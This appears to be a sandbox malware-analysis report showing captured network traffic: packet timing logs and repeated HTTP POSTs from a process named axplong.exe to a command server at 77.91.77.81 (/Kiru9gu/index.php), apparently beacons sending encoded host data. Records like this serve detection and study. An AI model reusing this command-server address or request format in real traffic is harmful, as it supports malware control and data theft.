                  Jul 2, 2024 00:28:56.247020006 CEST805000277.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:56.247087002 CEST5000280192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:56.369894028 CEST5000280192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:56.370275974 CEST5000380192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:56.376849890 CEST805000277.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:56.376868963 CEST805000377.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:56.376903057 CEST5000280192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:56.376969099 CEST5000380192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:56.377110958 CEST5000380192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:56.384115934 CEST805000377.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:57.085580111 CEST805000377.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:57.085680008 CEST5000380192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.089101076 CEST5000380192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.089102030 CEST5000480192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.096005917 CEST805000477.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:57.096237898 CEST805000377.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:57.096259117 CEST5000480192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.096350908 CEST5000480192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.096574068 CEST5000380192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.103410959 CEST805000477.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:57.814265013 CEST805000477.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:57.814321995 CEST5000480192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.932241917 CEST5000480192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.932573080 CEST5000580192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.939368963 CEST805000477.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:57.939420938 CEST5000480192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.939651012 CEST805000577.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:57.939724922 CEST5000580192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.939908981 CEST5000580192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:57.948618889 CEST805000577.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:58.649492025 CEST805000577.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:58.649565935 CEST5000580192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:58.660300016 CEST5000580192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:58.660746098 CEST5000680192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:58.665488958 CEST805000577.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:58.665541887 CEST5000580192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:58.665915966 CEST805000677.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:58.665981054 CEST5000680192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:58.666245937 CEST5000680192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:58.672257900 CEST805000677.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:59.369877100 CEST805000677.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:59.369970083 CEST5000680192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:59.478116035 CEST5000680192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:59.478127003 CEST5000780192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:59.483072042 CEST805000777.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:59.483352900 CEST5000780192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:59.483844995 CEST5000780192.168.2.477.91.77.81
                  Jul 2, 2024 00:28:59.489546061 CEST805000777.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:59.499805927 CEST805000677.91.77.81192.168.2.4
                  Jul 2, 2024 00:28:59.499929905 CEST5000680192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:00.202559948 CEST805000777.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:00.202617884 CEST5000780192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:01.320354939 CEST5000780192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:01.320844889 CEST5000880192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:01.325427055 CEST805000777.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:01.325489998 CEST5000780192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:01.325767994 CEST805000877.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:01.325828075 CEST5000880192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:01.326344967 CEST5000880192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:01.331478119 CEST805000877.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:02.032885075 CEST805000877.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:02.033091068 CEST5000880192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.150072098 CEST5000880192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.151128054 CEST5000980192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.155227900 CEST805000877.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:02.155302048 CEST5000880192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.155913115 CEST805000977.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:02.156058073 CEST5000980192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.160914898 CEST5000980192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.165891886 CEST805000977.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:02.858694077 CEST805000977.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:02.858763933 CEST5000980192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.861663103 CEST5000980192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.861969948 CEST5001080192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.866857052 CEST805000977.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:02.866920948 CEST805001077.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:02.866928101 CEST5000980192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.866985083 CEST5001080192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.867269039 CEST5001080192.168.2.477.91.77.81
                  Jul 2, 2024 00:29:02.872035027 CEST805001077.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:03.576337099 CEST805001077.91.77.81192.168.2.4
                  Jul 2, 2024 00:29:03.576395988 CEST5001080192.168.2.477.91.77.81
                  • 77.91.77.81
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.44973077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:04.486423016 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:05.210973024 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:05.212826014 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:05.442384958 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.44973177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:05.560897112 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:06.259165049 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:06.260385990 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:06.476042986 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.44973277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:06.612632990 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:07.334412098 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:07.381619930 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:07.608875036 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.44973377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:07.801911116 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:08.560523033 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:08.561197042 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:08.791405916 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.44973477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:08.902273893 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:09.594219923 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:09.595238924 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:09.815053940 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.44973577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:09.937644958 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:10.671236992 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:10.696626902 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:10.930313110 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.44973677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:11.266443014 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:11.985855103 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:11.986768961 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:12.205467939 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.44973777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:12.327614069 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:13.035478115 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:13.036891937 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:13.263062000 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.44973877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:13.392848015 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:14.127356052 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 2, 2024 00:25:14.171030045 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:25:14.389394999 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.44973977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:25:14.686851025 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:25:15.407799959 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:25:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
